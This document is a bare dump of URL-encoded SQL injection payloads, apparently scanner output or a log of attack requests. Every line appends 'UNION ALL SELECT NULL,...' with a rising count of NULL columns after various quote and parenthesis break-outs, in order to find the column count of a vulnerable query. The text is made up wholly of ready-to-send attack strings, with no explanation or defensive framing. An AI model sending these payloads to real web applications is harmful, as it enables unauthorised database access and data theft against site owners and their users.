1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 